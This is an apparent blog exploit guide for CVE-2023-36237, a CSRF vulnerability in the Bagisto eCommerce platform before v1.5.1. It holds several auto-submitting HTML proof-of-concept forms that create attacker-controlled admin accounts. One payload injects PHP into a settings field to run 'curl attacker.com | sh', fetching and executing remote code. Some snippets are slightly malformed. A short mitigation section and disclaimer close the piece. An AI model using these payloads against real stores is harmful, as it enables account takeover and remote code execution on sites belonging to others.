CVE-2023-36237 - How a Simple CSRF Bug in Bagisto (< v1.5.1) Lets Attackers Run Code – Full Exploit Guide

Bagisto is a popular open-source eCommerce platform built on Laravel, loved for its flexibility and feature set. But like any software, it sometimes ships with bugs. One that stirred up attention is a Cross-Site Request Forgery (CSRF) vulnerability, tracked as CVE-2023-36237.

This post will break down the bug, how it can be weaponized, and provide a simple, realistic proof-of-concept exploit. We’ll keep the language simple for anyone to grasp, and all content is crafted for this write-up — not just rehashed from CVE summaries.

What is CVE-2023-36237?

CVE-2023-36237 refers to a CSRF vulnerability discovered in Bagisto eCommerce platform versions before v1.5.1. It allows attackers to trick a logged-in admin (or privileged user) into executing unintended actions—potentially even executing arbitrary code—by simply visiting a malicious webpage.

This happens due to insufficient CSRF token validation on sensitive endpoints in the app’s admin panel.

Official CVE Description

*“Cross Site Request Forgery vulnerability in Bagisto before v.1.5.1 allows an attacker to execute arbitrary code via a crafted HTML script.”*

Why is this Dangerous?

CSRF attacks rely on authenticated user sessions. If an admin is logged in while visiting a malicious site, the attacker can piggyback on their session to trigger administrative actions—like creating new admin accounts, changing site settings, or, worst of all, injecting code to compromise the store.

In Bagisto versions before 1.5.1, many admin routes lack proper CSRF protection.

Let’s walk through a working example

Goal: Create a new administrator account by tricking a logged-in admin user.

Suppose, in Bagisto’s admin dashboard, user creation happens at

POST https://your-bagisto-shop.com/admin/users/create

Before v1.5.1, this route does not enforce CSRF tokens.

Step 2: Prepare the Attack Page

The attacker builds a malicious website hosting an HTML form which submits a POST request to Bagisto, with the victim’s browser carrying their admin cookies.

Here’s a working CSRF exploit as an HTML snippet

<html>
  <body onload="document.forms[].submit()">
    <form action="https://your-bagisto-shop.com/admin/users/create" method="POST">
      <input type="hidden" name="name" value="EvilAdmin">
      <input type="hidden" name="email" value="evil@attacker.com">
      <input type="hidden" name="password" value="P@sswrd!">
      <input type="hidden" name="role" value="admin">
    </form>
    <h1>If you see this, you’re probably already pwned…</h1>
  </body>
</html>

Step 3: Lure the Victim

The attacker persuades a Bagisto admin to visit the malicious page (e.g., via email, instant message, or by injecting a link in user comments).

When the page loads

- The form auto-submits a request to /admin/users/create

Optional: RCE (Remote Code Execution)

If Bagisto lets admins edit template code or store settings through the admin UI, a CSRF can further escalate! For example, the attacker could craft a request that injects PHP code into a page template or settings field.

Example: Injecting PHP into a settings field via CSRF

<form action="https://your-bagisto-shop.com/admin/settings/update"; method="POST">
  <input type="hidden" name="store_name" value="<?php system('curl attacker.com | sh');?>"/>
</form>
<script>document.forms[].submit()</script>

(*Note*: Actual endpoint/param names may differ; adjust based on your Bagisto version.)

Why Didn’t CSRF Protection Work Here?

All modern frameworks, including Laravel, come with CSRF middleware. However, in Bagisto below 1.5.1, either:

Some admin routes did not include CSRF middleware,

- Or the forms/pages didn’t correctly render CSRF token fields

This oversight left the endpoints open to forged requests.

Mitigation and Fix

Bagisto fixed this in version 1.5.1, adding tighter CSRF validation across the board.

Update Immediately: If you run Bagisto, make sure you’re on 1.5.1 or above.

- Double-check custom extensions: If you wrote custom modules or overridden routes, ensure they also require CSRF tokens.

References & More Reading

- NVD: CVE-2023-36237 entry
- Bagisto Release 1.5.1 on GitHub
- OWASP: Cross-Site Request Forgery (CSRF)

Full PoC Attack Example

<!-- Save as csrf.html and send to a logged-in Bagisto admin before v1.5.1 -->
<html>
  <body onload="document.getElementById('csrf').submit()">
    <form id="csrf" action="https://your-bagisto-shop.com/admin/users/create" method="POST">
      <input type="hidden" name="name" value="BadGuy">
      <input type="hidden" name="email" value="badguy@evil.com">
      <input type="hidden" name="password" value="supersecret">
      <input type="hidden" name="role" value="admin">
    </form>
    <h2>This page exploits CVE-2023-36237 in Bagisto by creating a new admin user!</h2>
  </body>
</html>

Conclusion

CVE-2023-36237 is a classic web security pitfall—never skip CSRF protection on admin routes! If you run Bagisto, patch NOW. If you develop on top of any eCommerce platform, check your endpoints for CSRF defense.

Stay safe and always test your updates!

*This post is original content, created for educational and awareness purposes. Use responsibly. If you discover a similar bug, please report to the vendor before public disclosure.*

Timeline

Published on: 02/26/2024 22:15:06 UTC
Last modified on: 08/01/2024 13:44:05 UTC